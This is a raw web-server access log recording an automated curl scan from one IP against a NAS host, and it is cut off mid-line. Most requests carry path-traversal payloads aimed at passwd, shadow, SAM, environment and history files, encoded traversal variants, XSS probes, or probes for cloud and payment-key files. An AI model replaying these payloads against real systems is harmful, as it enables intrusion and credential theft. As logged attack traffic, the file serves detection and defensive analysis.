[Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/codefresh.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 404 404 - GET https nas.profibot.hu "/render/preview" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:07 +0000] - 403 403 - GET https nas.profibot.hu "/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/sendmail.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/workflow/routing.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/nuget.config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/tmp/tempfile" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/braintree/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/build.gradle.kts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/dump.bak" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/:2379" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - - 400 - GET https nas.profibot.hu "-" [Client 185.177.72.49] [Length 154] [Gzip -] [Sent-to ] "-" "-" +[21/Jan/2026:01:24:08 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/boot/config.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 403 403 - GET https nas.profibot.hu "/..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/bluesnap/config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 403 403 - GET https nas.profibot.hu "/..%252f..%252f..%252f..%252f..%252f..%252fetc/hosts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 403 403 - GET https nas.profibot.hu "/.profile" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/etc/hosts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/dev.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/var/log/nginx/error.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 403 403 - GET https nas.profibot.hu "/.vscode/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/heralding/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/logs/mail/delivery.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/config/cryptomus.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/services/users/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/applicationHost.config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 404 404 - GET https nas.profibot.hu "/install/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:08 +0000] - 403 403 - GET https nas.profibot.hu "/.kube/credentials" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/saas/invoice_engine.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/identity/authorize?scope=openid+admin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/psd2/client_credentials.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 403 403 - GET https nas.profibot.hu "/.aws/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/pos/devices/pairing_codes.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 403 403 - GET https nas.profibot.hu "/.prettierrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - - 403 - GET https nas.profibot.hu "/?lang=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/adyen/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/retry/queue/payment_retries.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/pyproject.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/chat/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/usr/lib/mail.rc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/usr/local/etc/msmtprc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/flux/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/:5601" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/debug/varnish/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/payments/fx_pricing_matrix.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/admin/impersonate?id=2" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/plugins/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/api/model/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 403 403 - GET https nas.profibot.hu "/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/shadow" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/wp-json/wp/v2/users" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - - 403 - GET https nas.profibot.hu "/?csp_report_uri=http://evil.com" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/alerts/escalation_policy.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:09 +0000] - 404 404 - GET https nas.profibot.hu "/newrelic/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/admin123/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/var/qmail/control/smtproutes" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/env/mail_settings.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/psd2/consent_flow.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/fulfillment/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/admin/login" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/vendor/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/storefront/pages/checkout.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/wp-admin/options-general.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/src/pages/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/envoy-admin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/src/config/paypal.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/signifyd/api_keys.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/index.php/admin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/server.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/shopify/config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/nft-drop/settings.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/keystone" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/cryptomus.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/model/hyperparams.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/nomad.hcl" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/api/payments/config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/Gemfile.lock" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/install-dev/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/helmfile.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:10 +0000] - 404 404 - GET https nas.profibot.hu "/swagger.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/monitoring" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - - 403 - GET https nas.profibot.hu "/?feed=http://" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/erpnext/sites/common_site_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/appveyor.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/mpesa/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 403 403 - GET https nas.profibot.hu "/circleci/.circleci/settings.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/mailer/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/astro.config.mjs" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/mqtt/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "///////etc/php.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/wp-admin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/etc/iptables/rules.v4" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/ics/network_map.png" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/ach/ach_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/aragon/arapp.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/script.js?source=javascript:alert(1)" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/explorer/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/tox.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/tmp/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/internal/fetch" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/v1_old/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/api/data?Authorization=Bearer%20null" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 404 404 - GET https nas.profibot.hu "/sezzle/keys.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:11 +0000] - 403 403 - GET https nas.profibot.hu "/..%255c..%255c..%255c..%255c..%255c..%255cvar/log/nginx/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/cryptomus.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/info.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/merchant/settings.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/users/permissions/manage" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/bolt/login" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/debug?xss={{=it.constructor.constructor(%27alert(1)%27)()}}" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/smtp.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/binancepay.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/nlp/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../var/log/apache2/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/transactions/swift_mapping.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/plugins/payment/setup.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/biometrics/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 403 403 - GET https nas.profibot.hu "/.well-known/stripe.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 403 403 - GET https nas.profibot.hu "/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afvar/log/apache2/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/install-backup.zip" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/vaultwarden/config.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/ios/exportOptions.plist" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/nft/drop_funding.yaml" [Client 